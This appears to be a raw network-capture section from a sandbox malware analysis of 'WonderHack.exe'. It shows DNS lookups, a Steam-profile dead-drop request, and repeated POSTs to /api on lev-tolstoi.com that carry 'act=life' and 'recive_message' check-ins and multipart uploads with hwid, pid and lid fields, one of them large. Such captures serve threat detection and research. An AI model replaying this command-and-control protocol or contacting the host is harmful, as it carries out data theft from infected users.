Dec 23, 2024 00:49:07.746644020 CET | 1.1.1.1 | 192.168.2.4 | 0x687a | Name error (3) | pollution-raker.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:07.885488987 CET | 1.1.1.1 | 192.168.2.4 | 0x2e7d | No error (0) | steamcommunity.com |  | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:10.504798889 CET | 1.1.1.1 | 192.168.2.4 | 0x6bf7 | No error (0) | lev-tolstoi.com |  | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:10.504798889 CET | 1.1.1.1 | 192.168.2.4 | 0x6bf7 | No error (0) | lev-tolstoi.com |  | 172.67.157.254 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49760 | 23.55.153.106 | 443 | 3696 | C:\Users\user\Desktop\WonderHack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 23:49:09 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-12-22 23:49:10 UTC | 1905 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Sun, 22 Dec 2024 23:49:09 GMT
    Content-Length: 35121
    Connection: close
    Set-Cookie: sessionid=32d8a0bc1b3577f29e8cdb62; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-22 23:49:10 UTC | 14479 | IN |
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-22 23:49:10 UTC | 10097 | IN |
    Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-22 23:49:10 UTC | 10545 | IN |
    Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49765 | 104.21.66.86 | 443 | 3696 | C:\Users\user\Desktop\WonderHack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 23:49:11 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
2024-12-22 23:49:11 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-22 23:49:12 UTC | 1129 | IN | HTTP/1.1 200 OK
    Date: Sun, 22 Dec 2024 23:49:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=o8c3fdkaqdp8ngt4do7ml21de0; expires=Thu, 17 Apr 2025 17:35:51 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ECMYctyjqywhYQ%2FFVpHcos%2FNaIWCBeptWEo2rzP0aMxhD5WA%2FT%2BBWhhKIxO9Dj7D1DsU%2BeAeVpjkNo1jId3jsCcb%2FnPpGJeSpI2NeWPxLa41xeVPGvPcZE5wWaJXYA7DWlo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f6401cdff9f8ca7-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1810&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1557333&cwnd=128&unsent_bytes=0&cid=23fe6ec199d31886&ts=768&x=0"
2024-12-22 23:49:12 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-12-22 23:49:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49771 | 104.21.66.86 | 443 | 3696 | C:\Users\user\Desktop\WonderHack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 23:49:13 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 54
    Host: lev-tolstoi.com
2024-12-22 23:49:13 UTC | 54 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--ybzklzpanlwp&j=
2024-12-22 23:49:14 UTC | 1129 | IN | HTTP/1.1 200 OK
    Date: Sun, 22 Dec 2024 23:49:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=kl3o0jvg739rmndcspstg5n76j; expires=Thu, 17 Apr 2025 17:35:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kA5LjRUjAHjbD3UPx949pT6mAz5CZ%2B%2FWlCPz%2Bg6OKfmgNHDwyO5WArjW%2FIMM2WjmOggowHPfMMZkq9EWULexuPwyPjg7FTt9ys1nxK6ZLnEZOGQfSn%2FYC1eFTGbr3bz7%2Bbc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6401db0c3df797-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1528&rtt_var=574&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=953&delivery_rate=1902280&cwnd=161&unsent_bytes=0&cid=bd47d09b9d602e3b&ts=776&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49777 | 104.21.66.86 | 443 | 3696 | C:\Users\user\Desktop\WonderHack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 23:49:16 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=38YTQXSPNP1CBN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18146
Host: lev-tolstoi.com
2024-12-22 23:49:16 UTC | 15331 | OUT | Data Raw: 2d 2d 33 38 59 54 51 58 53 50 4e 50 31 43 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 33 38 59 54 51 58 53 50 4e 50 31 43 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 38 59 54 51 58 53 50 4e 50 31 43 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 0d 0a 2d 2d 33
Data Ascii: --38YTQXSPNP1CBNContent-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--38YTQXSPNP1CBNContent-Disposition: form-data; name="pid"2--38YTQXSPNP1CBNContent-Disposition: form-data; name="lid"LPnhqo--ybzklzpanlwp--3
2024-12-22 23:49:17 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 23:49:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=62te2a48f8l8vue7jlco70aknq; expires=Thu, 17 Apr 2025 17:35:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxOP1HeL0GVTgNe%2FnXjsqGyLwFZllYIcvlDP%2FM%2FohRqN9cwLA9Stw%2Bs%2F2Nwu64eVydIKh53i5xIlQ3lWA%2BetGWMf3mU6dNb%2B71F9oFtS9MYMbnHvlL4ueH3G5q42z6AGOUE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6401e8fde43314-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1807&rtt_var=680&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19103&delivery_rate=1607044&cwnd=207&unsent_bytes=0&cid=2f69cdba9630a2f6&ts=946&x=0"
2024-12-22 23:49:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-22 23:49:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49784        104.21.66.86    443               3696  C:\Users\user\Desktop\WonderHack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-22 23:49:18 UTC  273                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=AF7HU3P5H1T
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8749
    Host: lev-tolstoi.com
2024-12-22 23:49:18 UTC  8749               OUT        Data Raw: 2d 2d 41 46 37 48 55 33 50 35 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 41 46 37 48 55 33 50 35 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 46 37 48 55 33 50 35 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 0d 0a 2d 2d 41 46 37 48 55 33 50 35 48 31
    Data Ascii: --AF7HU3P5H1TContent-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--AF7HU3P5H1TContent-Disposition: form-data; name="pid"2--AF7HU3P5H1TContent-Disposition: form-data; name="lid"LPnhqo--ybzklzpanlwp--AF7HU3P5H1
2024-12-22 23:49:19 UTC  1124               IN         HTTP/1.1 200 OK
    Date: Sun, 22 Dec 2024 23:49:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=ui8fi04rj17u78fvd07qpnhukd; expires=Thu, 17 Apr 2025 17:35:58 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EGIewKP1WbBvD3bX4WJdbceENWFuXPuiJx91LCscq5dNvS6Oze8ZyuAROojsecOhWVGRt8muI40Hg%2BrJfFRYN%2FOxD7HrdianWjLuiBMaIQopUKDSVkkw1njcMJmaB9nfRNI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f6401f70bdf0f73-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1550&rtt_var=623&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2834&recv_bytes=9680&delivery_rate=1883870&cwnd=233&unsent_bytes=0&cid=c7923d92f7e8becd&ts=1103&x=0"
2024-12-22 23:49:19 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-22 23:49:19 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49793        104.21.66.86    443               3696  C:\Users\user\Desktop\WonderHack.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-22 23:49:20 UTC  282                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=D4D6LD3A1MO86BTXG0I
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20450
    Host: lev-tolstoi.com
2024-12-22 23:49:20 UTC  15331              OUT        Data Raw: 2d 2d 44 34 44 36 4c 44 33 41 31 4d 4f 38 36 42 54 58 47 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 44 34 44 36 4c 44 33 41 31 4d 4f 38 36 42 54 58 47 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 34 44 36 4c 44 33 41 31 4d 4f 38 36 42 54 58 47 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62
    Data Ascii: --D4D6LD3A1MO86BTXG0IContent-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--D4D6LD3A1MO86BTXG0IContent-Disposition: form-data; name="pid"3--D4D6LD3A1MO86BTXG0IContent-Disposition: form-data; name="lid"LPnhqo--yb
2024-12-22 23:49:20 UTC  5119               OUT        Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii: `M?lrQMn 64F6(X&7~
2024-12-22 23:49:21 UTC  1127               IN         HTTP/1.1 200 OK
    Date: Sun, 22 Dec 2024 23:49:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=0m7ldpc0nrrin5nklv9e4fjmmc; expires=Thu, 17 Apr 2025 17:36:00 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YlzRlSk%2BBys9kSIViYF3GrU76dLpUIldUZjmspRDtqqIKvSgP3Zd%2BGMSoNg2irrSsrGcYV2rLiEX2Iv7b%2FT2RCmyrjoZ6SphKq2lbIllZvdeJj0VMf6Aqx5VxYffqerRzSE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f640206fac90f80-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1478&rtt_var=590&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21412&delivery_rate=1801357&cwnd=207&unsent_bytes=0&cid=ae363558c3b0f773&ts=973&x=0"
2024-12-22 23:49:21 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-22 23:49:21 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.449800104.21.66.864433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:23 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=SBUV6UEUOZ0XP5Q
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 1225
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:23 UTC1225OUTData Raw: 2d 2d 53 42 55 56 36 55 45 55 4f 5a 30 58 50 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 53 42 55 56 36 55 45 55 4f 5a 30 58 50 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 42 55 56 36 55 45 55 4f 5a 30 58 50 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: --SBUV6UEUOZ0XP5QContent-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--SBUV6UEUOZ0XP5QContent-Disposition: form-data; name="pid"1--SBUV6UEUOZ0XP5QContent-Disposition: form-data; name="lid"LPnhqo--ybzklzpanlwp
2024-12-22 23:49:24 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:24 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=lpmsa94bs633ehrpmo5c6ugg9g; expires=Thu, 17 Apr 2025 17:36:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BTWq4gz5C%2FVwn1Ql1FVcrZwtjPssG49w%2BUXfwMlFK4ELWZLcRfJssizUepOlzdBCtI7mKsRD2f6kKogBX6pbKY5IvImFSzk7L6ASIJY3KR%2BthEgHYCUF2zN82cJbIjemZrY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f640217fb54430f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1586&rtt_var=619&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2138&delivery_rate=1732937&cwnd=214&unsent_bytes=0&cid=0adfd5c490e226fd&ts=813&x=0"
2024-12-22 23:49:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
2024-12-22 23:49:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49806 | 104.21.66.86 | 443 | 3696 | C:\Users\user\Desktop\WonderHack.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 23:49:26 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=WQKZ4A7CKB5
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 587715
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 2d 2d 57 51 4b 5a 34 41 37 43 4b 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 57 51 4b 5a 34 41 37 43 4b 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 51 4b 5a 34 41 37 43 4b 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 0d 0a 2d 2d 57 51 4b 5a 34 41 37 43 4b 42
                                                                                                                                                                                                                                                                        Data Ascii: --WQKZ4A7CKB5Content-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--WQKZ4A7CKB5Content-Disposition: form-data; name="pid"1--WQKZ4A7CKB5Content-Disposition: form-data; name="lid"LPnhqo--ybzklzpanlwp--WQKZ4A7CKB
